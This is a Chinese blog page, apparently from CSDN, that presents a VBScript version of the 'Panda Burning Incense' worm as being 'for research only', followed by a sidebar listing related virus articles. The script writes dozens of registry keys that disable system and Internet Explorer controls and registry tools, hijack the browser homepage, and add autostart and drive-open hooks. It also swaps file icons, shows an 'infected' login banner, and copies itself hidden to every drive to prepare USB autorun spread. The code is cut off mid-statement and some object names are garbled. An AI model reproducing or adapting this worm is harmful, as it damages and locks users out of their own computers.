熊猫烧香病毒vbs版本 仅供研究

最新推荐文章于 2024-08-02 21:59:43 发布
最新推荐文章于 2024-08-02 21:59:43 发布
阅读量6.7k 收藏 13
点赞数 6
分类专栏: Linux VBS 文章标签: c search url internet system dll
VBS 同时被 2 个专栏收录
19 篇文章 1 订阅
订阅专栏
Linux
3 篇文章 0 订阅
订阅专栏

 dim fso,wsh,myfile,ws,pp,fsoFolder
set wsh=w.createobject("w.shell")
set fso=w.createobject("ing.filesystemobject")
set myfile=fso.GetFile(w.fullname)
'修改注册表(开始菜单里面的东西和IE各项设置)
wsh.Regwrite "HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Advanced/Folder/Hidden/SHOWALL/CheckedValue",0,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Restrictions/NoBrowserContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Restrictions/NoBrowserOptions",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Restrictions/NoBrowserSaveAs",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Restrictions/NoFileOpen",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/Advanced",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/Cache Internet",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/AutoConfig",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/HomePage",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/History",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/Connwiz Admin Lock",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Internet Explorer/Main/Start Page","http://baidu.com"
wsh.Regwrite "HKCU/Software/Microsoft/Internet Explorer/Main/Search Page","http://baidu.com"
wsh.Regwrite "HKCU/Software/Microsoft/Internet Explorer/Main/Default_Page_URL","http://baidu.com"
wsh.Regwrite "HKCU/Software/Microsoft/Internet Explorer/Main/Default_Search_URL","http://baidu.com"
wsh.Regwrite "HKEY_USERS/.DEFAULT/Software/Microsoft/Internet Explorer/Main/Start Page","http://baidu.com"
wsh.Regwrite "HKEY_USERS/.DEFAULT/Software/Microsoft/Internet Explorer/Main/Default_Page_URL","http://baidu.com"
wsh.Regwrite "HKEY_USERS/.DEFAULT/Software/Microsoft/Internet Explorer/Main/Default_Search_URL","http://baidu.com"
wsh.Regwrite "HKEY_USERS/.DEFAULT/Software/Microsoft/Internet Explorer/Main/Search Page","http://baidu.com"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/HomePage",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/SecurityTab",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/ResetWebSettings",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Restrictions/NoViewSource",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Infodelivery/Restrictions/NoAddingSubions",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoFileMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/WinOldApp/NoRealMode",1,"REG_DWORD"
wsh.Regwrite "HKLM/Software/Microsoft/Windows/CurrentVersion/Run/Win32system","c:/NYboy.vbs"
wsh.Regwrite "HKLM/Software/Microsoft/Windows/CurrentVersion/Run/ScanRegistry",""
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoRun",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoDesktop",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoViewContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoTrayContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoClose",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/StartMenuLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoSMHelp",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoNetHood",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoWinKeys",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoSetFolders",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoRecentDocsMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoFind","1","REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoWindowsUpdate",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoSetTaskbar",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoFavoritesMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoRecentDocsHistory",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/System/DisableRegistryTools","1","REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/WinOldApp/Disabled",1,"REG_DWORD"
'使用户不能通过双击打开硬盘,这里还可以修改为使其不能通过双击打开文件夹,同理,不赘续
wsh.Regwrite "HKLM/SOFTWARE/Classes/Drive/shell/auto/command/","C:/NYboy.bat '%1'"
wsh.Regwrite "HKCR/Drive/shell/","auto"
wsh.Regwrite "HKCR/Drive/shell/auto/command/","C:/NYboy.bat '%1'"
wsh.Regwrite "HKLM/SOFTWARE/Classes/Directory/shell/","auto"
wsh.Regwrite "HKCR/Directory/shell/auto/command/","C:/NYboy.bat '%1'"
wsh.Regwrite "HKLM/SOFTWARE/Classes/Directory/shell/auto/command/","C:/NYboy.bat '%1'"
'修改默认文件图标,这里可以换成可爱的熊猫哦,(修改dll也可以实现,只是有点难)
wsh.Regwrite "HKCR/exefile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKCR/txtfile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKCR/dllfile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKCR/batfile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKCR/inifile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKLM/SOFTWARE/Classes/exefile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKLM/SOFTWARE/Classes/txtfile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKLM/SOFTWARE/Classes/dllfile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKLM/SOFTWARE/Classes/batfile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKLM/SOFTWARE/Classes/inifile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKLM/Software/CLASSES/.reg/","txtfile"
wsh.Regwrite "HKLM/Software/Microsoft/Windows/CurrentVersion/Winlogon/LegalNoticeCaption","你好啊,狂野少年和你开个小小的玩笑"
wsh.Regwrite "HKLM/Software/Microsoft/Windows/CurrentVersion/Winlogon/LegalNoticeText","你已经中毒了,赶快杀毒"
'复制自身到C,D,E,F,U盘
myfile.copy "c:/"
myfile.copy "D:/"
myfile.copy "E:/"
myfile.copy "F:/"
myfile.copy "I:/"
myfile.attributes=34
'定义Autorun.inf 的内容 这个就是u盘病毒必须的代码部分 这里可以简单写哦^_^
If fso.FileExists("C:/autorun.inf") Then
Set objFolder = fso.GetFile("C:/autorun.inf")
Else

hefenghhhh
关注
专栏目录
VBS经典教程详细版本教程
09-05
Microsoft Visual Basic Scripting Edition 将灵活的脚本应用于更广泛的领域,包括 Microsoft Internet Explorer 中的 Web 客户机脚本和 Microsoft Internet Information Service 中的 Web 服务器脚本。...
熊猫烧香病毒简析
winerdaxian的专栏
09-15 1216
熊猫烧香从2007年1月肆虐网络到现在。已经过了查不多4个年头了。病毒的作者李俊现在也从监狱里被放了出来。在当时熊猫烧香确实给大家一个意外,它采用了一种新的方式对计算机的程序和系统造成了很严重的破坏。   其实我的这篇文章也不叫什么分析,只是说简单的简析。我只是简单的对病毒的机
熊猫烧香 - 核心源码 (僅供研究使用!後果自行負責 )
hunhun02的专栏
03-01 1354
熊猫烧香 - 核心源码 -------------------------------------------------
MEMZ彩虹猫病毒资源免费下载
最新发布
2401_83947075的博客
08-02 2088
MEMZ彩虹猫病毒资源免费下载,百度网盘获取,免费。下载后运行以下程序即可,建议在虚拟机上运行。
熊猫烧香病毒完整解决方案
weixin_34292959的博客
01-27 710
这个方案也广为传播,传播组真是好样的 熊猫烧香病毒无疑成了近期互联网最热门的关键字了,网上也能找到很多个有关熊猫烧香病毒的解决办法,这些方法不尽完美,再加上熊猫的变种很多,很多方法已经失效。这里提供一个相对完整的方案供大家参考。病毒名:中文名:熊猫烧香病毒(又称武汉男生),英文名(Worm.WhBoy),目前发现的变种数已超过50个。典型表现:感染病毒后发现较多的EXE文件图标变成点着香的熊...
熊猫烧香病毒的分析报告
OpenSesame的博客
04-01 2169
第一次写博客,这个病毒挺经典的,拿来上手。 一、基础静态分析 先查壳,可以发现没加壳,程序是用delphi编写的 再看看导入函数,猜测这个病毒大概会做什么。 首先主要就是读写文件、读写注册表这些基本操作,还有FindFirstFileA、FindNextFileA说明会遍历电脑中的文件,CopyFile很可能会复制自己到某个目录然后再以另一个名称运行。 AdjustTokenPrivilege...
熊猫烧香 给人的深思
矩阵革命
01-31 3234
    98时代的CIH是一个,代表了虚拟机病毒的开始 Win的冲击波是一个,代表了针对Win2k漏洞病毒的开始 VBS的欢乐时光是一个,代表了脚本病毒的开始,不过只是思路而已,第二天本人手写的专杀工具开始工作了。 Email的求职信是一个,本人同学写过变种,MMS头漏洞的开始,更多的是利用人的好奇心理。其它的,不屑一顾阿。没有感觉了,还是木马和Exploit有前途。如今的病毒越来越没有技术含量了
Autorun.vbs病毒专杀工具
04-02
" Autorun.vbs病毒专杀工具 " 这个标题表明我们要讨论的是一款专门用于清除或防御名为 "Autorun.vbs" 的病毒的软件工具。Autorun.vbs病毒是一种常见的计算机恶意软件,它利用Windows操作系统中的自动运行功能进行...
VBS蠕虫病毒分析研究及防护措施
12-25
VBS蠕虫病毒分析研究及防护措施 只有有vbs代码段分析说明,文字描述,和预防vbs病毒措施
对一个vbs脚本病毒的病毒原理分析
09-01
主要介绍了对一个vbs脚本病毒的病毒原理分析的相关资料,非常不错,具有参考借鉴价值,需要的朋友可以参考下
vbs jdk版本切换
04-02
这是个切换jdk版本的脚本,公司的项目要用比较老的jdk版本(1.6),大多数新的框架需要比较新的jdk 版本(1.8),之前想着再买个笔记本,一个办公,一个试手,后来选半天实在不知道选哪个,,就不选了,写了这个来控制jdk 版本,...
熊猫烧香背后黑客社会1
为天加朵云...
09-20 1576
熊猫烧香背后黑客社会编辑:未知 文章来源:http://blog.csdn.net/it88blog/archive/2007/09/20/1792753.aspx李俊还远非一个“完美”的罪犯,更大的“老板”可能通过比“熊猫烧香”隐蔽得多的病毒,每个月攫取200万元的财富   舆论和李俊制造的电脑病毒一样厉害,从年前到年后,这个武汉新洲阳逻的25岁“男孩”蹲在湖北仙桃市第一看守所,外面
vbs病毒代码及其分析
11-22 2969
On Error Resume NextSet fs=CreateObject("Scripting.FileSystemObject")Set dir1=fs.GetSpecialFolder(0)Set dir2=fs.GetSpecialFolder(1)Set so=CreateObject("Scripting.FileSystemObject")dim rSet r=CreateObj
用邮件传送的Vbs编写蠕虫病毒有什么特征
05-16
使用邮件传送Vbs编写蠕虫病毒的特征可能包括以下几点: 1. 通过邮件传播:蠕虫病毒通常会通过邮件传送自身,以便感染更多的计算机系统。 2. 使用Vbs编写:Vbs(Visual Basic Script)是一种微软基于Visual Basic开发的脚本语言,适用于Windows系统,可以用于编写各种计算机程序和脚本。Vbs脚本通常以.vbs为后缀名,易于传播和执行。 3. 自我复制:蠕虫病毒通常会自我复制,以便在网络上传播,感染更多的计算机系统。 4. 修改系统设置:蠕虫病毒可能会修改受感染计算机的系统设置,以便在计算机启动时自动执行。 5. 破坏性:蠕虫病毒可能会破坏受感染计算机的文件、数据和系统设置,给计算机系统造成严重的损失。 请注意,编写和传播蠕虫病毒是非法的行为,可能会对他人的计算机系统造成严重的损失和影响。建议您不要尝试编写或传播任何类型的计算机病毒。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值